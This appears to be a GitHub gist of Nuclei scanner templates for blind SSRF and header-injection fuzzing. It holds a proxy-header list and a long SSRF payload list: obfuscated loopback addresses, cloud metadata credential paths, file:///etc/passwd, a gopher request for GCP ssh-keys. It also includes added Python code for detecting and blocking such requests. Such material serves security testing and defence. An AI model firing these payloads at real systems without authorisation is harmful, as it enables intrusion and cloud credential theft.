@ResistanceIsUseless
Last active December 30, 2024 07:50
Nuclei SSRF Fuzzing Template

```yaml
id: header-blind-ssrf

info:
  name: Header Blind SSRF Injection
  author: geeknik,nullrabbit
  severity: high
  description: Checks for Blind SSRF via popular browser headers.
  tags: ssrf

requests:
  - payloads:
      header: helpers/payloads/proxy-headers.txt
    raw:
      - |
        GET /?§header§ HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        §header§: {{interactsh-url}}
        Connection: close
    redirects: true
    max-redirects: 5
    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
          - "http"
        condition: or
```

```yaml
id: header-injection

info:
  name: Header SSRF Injection
  author: nullrabbit
  severity: high
  description: Fuzzing headers for OOB SSRF
  tags: fuzz,ssrf

requests:
  - payloads:
      # loaded here, but none of the raw requests below references §header§
      header: helpers/payloads/proxy-headers.txt
    raw:
      - |
        GET / HTTP/1.1
        Host: {{interactsh-url}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Connection: close
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Host: {{interactsh-url}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Connection: close
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}@{{interactsh-url}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Connection: close
      - |
        GET / HTTP/1.1
        Host: {{BaseURL}}@{{interactsh-url}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Connection: close
      - |
        GET @{{interactsh-url}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Connection: close
      - |
        GET {{BaseURL}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Connection: close
      - |
        GET / HTTP/1.1
        Host: {{interactsh-url}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        X-Forwarded-Host: {{interactsh-url}}
        Connection: close
      - |
        GET /{{interactsh-url}}/{{interactsh-url}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Connection: close
      - |
        GET {{BaseURL}} HTTP/1.1
        Host: {{interactsh-url}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        X-Forwarded-Host: {{interactsh-url}}
        Via: {{interactsh-url}}
        Connection: close
      - |
        GET / HTTP/1.1
        Host: {{BaseURL}}/?{{interactsh-url}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        X-Forwarded-Host: {{interactsh-url}}
        Via: {{interactsh-url}}
        Connection: close
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        X-Forwarded-For: {{interactsh-url}}
        Referer: {{BaseURL}}/?url={{interactsh-url}}
        Connection: close
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        X-Forwarded-For: {{interactsh-url}}
        Referer: {{BaseURL}}/?url={{interactsh-url}}
        True-Client-IP: {{interactsh-url}}
        X-WAP-Profile: http://{{interactsh-url}}/wap.xml
        Connection: close
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        X-Forwarded-For: {{interactsh-url}}
        Expect-Ct: max-age=6*6, report-uri="https://{{interactsh-url}}/expect-ct"
        Connection: close
      - |
        GET /admin HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        X-Forwarded-For: {{interactsh-url}}
        Connection: close
      - |
        POST /admin HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        X-Forwarded-To: {{interactsh-url}}
        Connection: close
      - |
        GET /api/v1/;;/admin/ HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        X-Forwarded-For: {{interactsh-url}}
        Connection: close
      - |
        GET /api/;;/admin/ HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        X-Forwarded-For: {{interactsh-url}}
        Connection: close
      - |
        GET /api/v1/secrets HTTP/1.1
        Host: 127.0.0.1
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        X-Forwarded-For: {{interactsh-url}}
        Connection: close
      - |
        CONNECT {{interactsh-url}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        X-Forwarded-Host: {{interactsh-url}}
        X-Forwarded-For: {{interactsh-url}}
      - |
        POST / HTTP/1.1
        Host: {{interactsh-url}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        X-Forwarded-For: {{interactsh-url}}
        Connection: close
      - |
        HEAD / HTTP/1.1
        Host: {{interactsh-url}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        X-Forwarded-To: {{interactsh-url}}
        Connection: close
      - |
        HEAD / HTTP/1.1
        Host: {{Hostname}}
        Host: {{interactsh-url}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Connection: close
      - |
        HEAD / HTTP/1.1
        Host: {{interactsh-url}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Connection: close
      - |
        GET /stats HTTP/1.1
        Host: 127.0.0.1:9901
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Connection: close
      - |
        GET /services HTTP/1.1
        Host: 127.0.0.1:8001
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Connection: close
      - |
        GET /services HTTP/1.1
        Host: 127.0.0.1:8444
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Connection: close
    redirects: true
    # with `or`, any 200 or 302 response matches on its own, so expect noise;
    # the interactsh matcher is the reliable signal
    matchers-condition: or
    matchers:
      - type: status
        status:
          - 200
          - 302
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
          - "http"
```

helpers/payloads/proxy-headers.txt (the header list the templates load):

```text
Proxy-Host
Request-Uri
X-Forwarded
X-Forwarded-By
X-Forwarded-For
X-Forwarded-For-Original
X-Forwarded-Host
X-Forwarded-Server
X-Forwarder-For
X-Forward-For
x-forwarded-proto
Base-Url
Http-Url
Proxy-Url
Redirect
Real-Ip
Referer
Referrer
Refferer
Uri
X-Host
X-Http-Destinationurl
X-Http-Host-Override
X-Original-Remote-Addr
X-Original-Url
X-Proxy-Url
X-Rewrite-Url
X-Real-Ip
X-Remote-Addr
x-requested-with
x-request-id
x-wap-profile
x-csrftoken
x-cluster-client-ip
x-client-ip
x-arbitrary
uid
true-client-ip
proxy-host
warning
user-agent
Location
via
Alt-Svc
Proxy
Profile
Origin
link
from
forwarded
destination
cookie
contact
cluster-client-ip
cluster
client-ip
cf-connecting-ip
alt-svc
accept-language
accept
HTTP_FORWARDED
HTTP_CLIENT_IP
HTTP_FORWARDED_FOR
HTTP_X_FORWARDED
HTTP_X_FORWARDED_FOR
if-modified-since
```
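Because the templates above probe exactly these headers, an origin that logs request headers can watch for them. The Python below is an added example, not part of the gist: it runs a small detection over a few constructed JSON-lines access-log entries. The log format, the trusted-proxy range 10.0.0.0/24, the served hostname app.example.test, the stand-in callback host oob.interact-placeholder.test and the grouping of the list's headers into IP-valued and host-valued sets are all assumptions made here. It flags proxy headers arriving from a peer other than the trusted proxy, IP-typed headers carrying something that is not an IP address, and host-typed headers pointing at a host the application does not serve.

```python
import ipaddress
import json
from urllib.parse import urlsplit

# Constructed deployment facts: the only peers allowed to set proxy headers on their way
# to the origin, and the hostnames the application actually serves.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/24")]
ALLOWED_HOSTS = {"app.example.test"}

# Headers from proxy-headers.txt, grouped by what a real upstream proxy puts in them
# (this grouping is the example's assumption, not something the gist states).
IP_VALUED_HEADERS = {
    "x-forwarded-for", "x-forwarded-for-original", "x-forward-for", "x-forwarder-for",
    "x-forwarded-by", "x-real-ip", "real-ip", "true-client-ip", "cf-connecting-ip",
    "x-client-ip", "client-ip", "x-cluster-client-ip", "cluster-client-ip",
    "x-remote-addr", "x-original-remote-addr",
}
HOST_VALUED_HEADERS = {
    "x-forwarded-host", "x-host", "x-http-host-override", "proxy-host", "x-original-url",
    "x-rewrite-url", "x-proxy-url", "x-http-destinationurl", "base-url", "http-url",
    "proxy-url",
}

# Constructed JSON-lines access log: one request per line, headers captured at the origin.
SAMPLE_LOG = """\
{"remote_addr": "10.0.0.5", "method": "GET", "path": "/", "headers": {"Host": "app.example.test", "X-Forwarded-For": "203.0.113.7", "X-Forwarded-Host": "app.example.test"}}
{"remote_addr": "198.51.100.9", "method": "GET", "path": "/", "headers": {"Host": "app.example.test", "X-Forwarded-Host": "oob.interact-placeholder.test"}}
{"remote_addr": "10.0.0.5", "method": "GET", "path": "/admin", "headers": {"Host": "app.example.test", "X-Forwarded-For": "oob.interact-placeholder.test, 203.0.113.7", "True-Client-IP": "oob.interact-placeholder.test"}}
{"remote_addr": "10.0.0.5", "method": "HEAD", "path": "/", "headers": {"Host": "app.example.test", "X-Forwarded-For": "203.0.113.7", "X-Rewrite-Url": "/admin"}}
"""


def is_ip(text):
    """True if text (optionally bracketed) is an IPv4 or IPv6 address literal."""
    try:
        ipaddress.ip_address(text.strip("[]"))
        return True
    except ValueError:
        return False


def host_of(value):
    """Host part of a header value that may be a URL, a bare host[:port], or a plain path.
    Returns None for a path-only value and a sentinel for values urlsplit rejects."""
    text = value.strip()
    if "://" not in text and not text.startswith("/"):
        text = "//" + text            # make urlsplit treat a bare host[:port] as an authority
    try:
        return urlsplit(text).hostname   # lower-cased, brackets and port removed, userinfo dropped
    except ValueError:
        return "<unparseable>"


def inspect_entry(entry):
    """Return a list of (kind, detail) findings for one log entry."""
    findings = []
    peer = ipaddress.ip_address(entry["remote_addr"])
    headers = {name.lower(): value for name, value in entry["headers"].items()}
    proxy_headers = sorted(h for h in headers if h in IP_VALUED_HEADERS or h in HOST_VALUED_HEADERS)
    # An origin behind a proxy should only ever see these headers from that proxy.
    if proxy_headers and not any(peer in net for net in TRUSTED_PROXIES):
        findings.append(("proxy-header-from-untrusted-peer", ", ".join(proxy_headers)))
    for name, value in headers.items():
        if name in IP_VALUED_HEADERS:
            for element in value.split(","):       # X-Forwarded-For is a comma-separated chain
                if not is_ip(element.strip()):
                    findings.append(("non-ip-in-ip-header", f"{name}={element.strip()}"))
        elif name in HOST_VALUED_HEADERS:
            host = host_of(value)
            if host is not None and host not in ALLOWED_HOSTS:
                findings.append(("foreign-host-in-proxy-header", f"{name}={host}"))
    return findings


def scan(log_text):
    """Run inspect_entry over every JSON line; returns (line number, kind, detail) tuples."""
    results = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        if line.strip():
            for kind, detail in inspect_entry(json.loads(line)):
                results.append((lineno, kind, detail))
    return results


if __name__ == "__main__":
    for lineno, kind, detail in scan(SAMPLE_LOG):
        print(f"line {lineno}: {kind}: {detail}")
```

On the constructed log, line 1 is a normal request through the proxy, line 2 carries a proxy header straight from an untrusted peer with a foreign host in it, line 3 has callback hostnames in two IP-typed headers, and line 4 has a path-only rewrite header that the host check deliberately ignores. Tune the two sets to the headers your proxy really emits; anything it never sets is simply client-controlled input.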

helpers/payloads/ssrf-hosts.txt (the host list the last template loads; entries that appeared twice are listed once):

```text
127.0.0.1
127.0.1.3
0
127.1
127.0.1
localhost
1.0.0.127.in-addr.arpa
01111111000000000000000000000001
0x7f.0x0.0x0.0x1
0177.0.0.01
7F000001
2130706433
6425673729
127001
127_0._0_1
0000::1
0000::1:80
::ffff:7f00:0001
0000:0000:0000:0000:0000:ffff:7f00:0001
spoofed.burpcollaborator.net
localtest.me
customer1.app.localhost.my.company.127.0.0.1.nip.io
bugbounty.dod.network
127.127.127.127
0177.0.0.1
⓪ⓧⓐ⑨。⓪ⓧⓕⓔ。⓪ⓧⓐ⑨。⓪ⓧⓕⓔ:80
⓪ⓧⓐ⑨ⓕⓔⓐ⑨ⓕⓔ:80
②⑧⑤②⓪③⑨①⑥⑥:80
⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥:80
[email protected]
0x7f000001
017700000001
0177.00.00.01
0000.0000.0000.0000
0177.0000.0000.0001
0177.0001.0000..0001
0x7f.0x1.0x0.0x1
0x7f.0x1.0x1
0x7f.0x00.0x00.0x01
ht�️tp://12�7.0.0.1
localhost:+11211aaa
localhost:00011211aaaa
loopback:+11211aaa
loopback:00011211aaaa
⑯⑨。②⑤④。⑯⑨。②⑤④
169.254.169.254
2852039166
7147006462
0xa9.0xfe.0xa9.0xfe
0251.0376.0251.0376
169。254。169。254
④②⑤。⑤①⓪。④②⑤。⑤①⓪:80
⓪⓪②⑤①。⓪⓪⓪③⑦⑥。⓪⓪⓪⓪②⑤①。⓪⓪⓪⓪⓪③⑦⑥:80
[::①⑥⑨。②⑤④。⑯⑨。②⑤④]:80
[::ⓕⓕⓕⓕ:①⑥⑨。②⑤④。⑯⑨。②⑤④]:80
⓪ⓧⓐ⑨。⓪③⑦⑥。④③⑤①⑧:80
⓪ⓧⓐ⑨。⑯⑥⑧⑨⑥⑥②:80
⓪⓪②⑤①。⑯⑥⑧⑨⑥⑥②:80
⓪⓪②⑤①。⓪ⓧⓕⓔ。④③⑤①⑧:80
dict://attacker:11111
file:///etc/passwd
file://\/\/etc/passwd
file://path/to/file
gopher://metadata.google.internal:80/xGET%20/computeMetadata/v1/instance/attributes/ssh-keys%20HTTP%2f%31%2e%31%0AHost:%20metadata.google.internal%0AAccept:%20%2a%2f%2a%0aMetadata-Flavor:%20Google%0d%0a
gopher://nozaki.io/_SSRF%0ATest!
0.0.0.0:22
0.0.0.0:443
0.0.0.0:80
0.0.0.0:3389
0000::1:22
0000::1:25
0000::1:3128
0000::1:3389
0251.00376.000251.0000376
0x41414141A9FEA9FE
0xA9.0xFE.0xA9.0xFE
0xA9FEA9FE
0xa9fea9fe
100.100.100.200/latest/meta-data/
100.100.100.200/latest/meta-data/image-id
100.100.100.200/latest/meta-data/instance-id
127.0.0.0
127.0.0.1:22
127.0.0.1:2379/version
127.0.0.1:443
127.0.0.1:80
127.0.0.1:3389
127.0.0.1:8000
127.0.0.1:9901
127.0.0.1:8001
127.0.0.1:8444
127.1.1.1
127.1.1.1:80#\@127.2.2.2:80
127.1.1.1:80:\@@127.2.2.2:80
127.1.1.1:80\@127.2.2.2:80
127.1.1.1:80\@@127.2.2.2:80
127.127.127.127.nip.io
169.254.169.254.xip.io
169.254.169.254/computeMetadata/v1/
169.254.169.254/latest/dynamic/instance-identity/document
169.254.169.254/latest/meta-data/
169.254.169.254/latest/meta-data/ami-id
169.254.169.254/latest/meta-data/hostname
169.254.169.254/latest/meta-data/iam/security-credentials/
169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
169.254.169.254/latest/meta-data/iam/security-credentials/dummy
169.254.169.254/latest/meta-data/iam/security-credentials/s3access
169.254.169.254/latest/meta-data/public-keys/
169.254.169.254/latest/meta-data/public-keys/0/openssh-key
169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
169.254.169.254/latest/meta-data/reservation-id
169.254.169.254/latest/user-data
169.254.169.254/latest/user-data/iam/security-credentials/
192.0.0.192/latest/
192.0.0.192/latest/attributes/
192.0.0.192/latest/meta-data/
192.0.0.192/latest/user-data/
1ynrnhl.xip.io
3232235521
3232235777
425.510.425.510
[0:0:0:0:0:ffff:127.0.0.1]
[0:0:0:0:0:ffff:127.0.0.1]:8000
[0:0:0:0:0:ffff:127.0.0.1]:8001
[0:0:0:0:0:ffff:127.0.0.1]:8444
[0:0:0:0:0:ffff:127.0.0.1]:9901
[::]
[::]:22
[::]:25
[::]:3128
[::]:80
[::]:3389
[::]:8000
[::]:8001
[::]:8444
[::]:9901
app-169-254-169-254.nip.io
customer2-app-169-254-169-254.nip.io
instance-data
localhost:22
localhost:443
localhost:80
localhost:3389
localhost:8000
localhost:8001
localhost:8444
localhost:9901
localhost.localdomain
loopback
loopback:22
loopback:80
loopback:443
loopback:3389
loopback:8000
loopback:9901
loopback:8001
loopback:8444
ipcop.localdomain:8443
mail.ebc.apple.com
metadata.google.internal/computeMetadata/v1/
metadata.google.internal/computeMetadata/v1/instance/hostname
metadata.google.internal/computeMetadata/v1/instance/id
metadata.google.internal/computeMetadata/v1/project/project-id
metadata.nicob.net
owasp.org.169.254.169.254.nip.io
ssrf-169.254.169.254.localdomain.pw
ssrf-cloud.localdomain.pw
www.owasp.org.1ynrnhl.xip.io
```
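Almost every entry in this list is a different spelling of a handful of internal addresses (127.0.0.1, 169.254.169.254, 100.100.100.200, ::1, 0.0.0.0) plus a few non-HTTP schemes, so a deny-list that compares strings misses most of them. The Python below is an added example, not part of the gist: a fail-closed target classifier that folds the spellings the list uses (NFKC for circled digits and letters, the ideographic full stop, decimal/hex/octal inet_aton-style IPv4, bracketed and IPv4-mapped IPv6, userinfo and port) to a canonical address and then asks ipaddress whether it is globally routable. The function names, the scheme allow-list and the three verdicts are this example's own choices.

```python
import ipaddress
import re
import unicodedata

# Names that reach the loopback interface without a DNS lookup on most systems.
LOOPBACK_NAMES = {"localhost", "localhost.localdomain", "loopback"}
SCHEME_RE = re.compile(r"^([a-z][a-z0-9+.-]*)://")
LABEL_RE = re.compile(r"^[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$")


def parse_legacy_ipv4(text):
    """Decode the inet_aton()-style spellings in the list above: one to four dot-separated
    parts, each decimal, 0x-hex or 0-prefixed octal, the last part filling the remaining
    bytes (so "127.1" and "2130706433" are both 127.0.0.1). Returns IPv4Address or None."""
    parts = text.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = []
    for part in parts:
        if not (part.isascii() and part.isalnum()):   # rejects "", "+1", "1_0", non-ASCII digits
            return None
        try:
            if part.startswith("0x"):
                values.append(int(part[2:], 16))
            elif len(part) > 1 and part.startswith("0"):
                values.append(int(part, 8))
            else:
                values.append(int(part, 10))
        except ValueError:
            return None
    tail_bytes = 5 - len(values)
    if any(v > 255 for v in values[:-1]) or values[-1] >= 1 << (8 * tail_bytes):
        return None                                    # 425.510.425.510 and 6425673729 land here
    number = 0
    for v in values[:-1]:
        number = (number << 8) | v
    return ipaddress.IPv4Address((number << (8 * tail_bytes)) | values[-1])


def split_target(raw):
    """Lenient split into (scheme, host, port), reading the string the way a permissive URL
    parser would: NFKC folds circled digits and letters, U+3002 becomes '.', the authority
    ends at the first '/', '?' or '#', and userinfo ends at the last '@'."""
    text = unicodedata.normalize("NFKC", raw.strip()).replace("\u3002", ".").lower()
    scheme = None
    match = SCHEME_RE.match(text)
    if match:
        scheme, text = match.group(1), text[match.end():]
    authority = re.split(r"[/?#]", text, maxsplit=1)[0]
    hostport = authority.rsplit("@", 1)[-1]
    if hostport.startswith("["):                       # bracketed IPv6 literal
        end = hostport.find("]")
        if end < 0:
            return scheme, hostport, "?"               # unterminated bracket: fails closed below
        host, rest = hostport[1:end], hostport[end + 1:]
        port = rest[1:] if rest.startswith(":") else ("" if not rest else "?")
    elif hostport.count(":") == 1:                     # host:port
        host, port = hostport.split(":")
    else:                                              # no port, or a bare IPv6 literal
        host, port = hostport, ""
    return scheme, host, port


def classify_target(raw):
    """'blocked' for anything that must never be fetched, 'public' for a globally routable
    IP literal, 'hostname' for a name that still has to be resolved (re-check every resolved
    address with this same logic and connect to that exact address, so nip.io-style names
    and DNS rebinding cannot slip past)."""
    scheme, host, port = split_target(raw)
    if scheme not in (None, "http", "https"):      # scheme allow-list: file:, gopher:, dict: never reach a fetcher
        return "blocked"
    if port and not port.isdigit():
        return "blocked"
    ip = parse_legacy_ipv4(host)
    if ip is None:
        try:
            ip = ipaddress.IPv6Address(host)
        except ValueError:
            ip = None
    if ip is not None:
        if ip.version == 6 and ip.ipv4_mapped is not None:
            ip = ip.ipv4_mapped                        # ::ffff:7f00:1 is 127.0.0.1 in disguise
        return "public" if ip.is_global else "blocked"
    if host in LOOPBACK_NAMES or host.endswith(".localhost"):
        return "blocked"
    labels = host.split(".")
    if 0 < len(host) <= 253 and all(LABEL_RE.match(label) for label in labels) and any(c.isalpha() for c in labels[-1]):
        return "hostname"
    return "blocked"                                   # unparseable: fail closed


if __name__ == "__main__":
    for sample in ("2130706433", "⑯⑨。②⑤④。⑯⑨。②⑤④", "[::ⓕⓕⓕⓕ:①⑥⑨。②⑤④。⑯⑨。②⑤④]:80",
                   "file:///etc/passwd", "localtest.me", "8.8.8.8"):
        print(f"{sample!r:48} -> {classify_target(sample)}")
```

Two design points worth keeping when adapting this: the check runs on the normalized form, never on the raw string, and anything it cannot parse is rejected rather than passed through. A "hostname" verdict is only half the decision; resolution has to happen inside the same check, with every returned address classified and the connection pinned to it, otherwise names such as the nip.io entries above resolve to 169.254.169.254 after the check has already said yes.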

```yaml
id: ssrf-header-injection

info:
  name: Header Command Injection
  author: nullrabbit
  severity: high
  description: Fuzzing headers for command injection
  tags: fuzz,ssrf

requests:
  - payloads:
      payload: helpers/payloads/ssrf-hosts.txt
      header: helpers/payloads/proxy-headers.txt
    raw:
      - |
        GET / HTTP/1.1
        Host: §payload§
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Connection: close
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        §header§: §payload§
        Connection: close
    # every header is paired with every host entry, so the request count is
    # (headers x hosts x 2 raw requests) per target
    attack: clusterbomb
    threads: 10
    matchers:
      - type: status
        status:
          - 200
```
@mb01LINX

mb01LINX commented Dec 21, 2024

How to use? I mean, in the nuclei command I try, but nothing works. How? No bugs in my time??..

@ResistanceIsUseless
Author

Did you make sure to have the payload files in helpers/payloads/ or whatever path works for you? I haven't confirmed it's working on the most recent versions of nuclei, but it should be working.
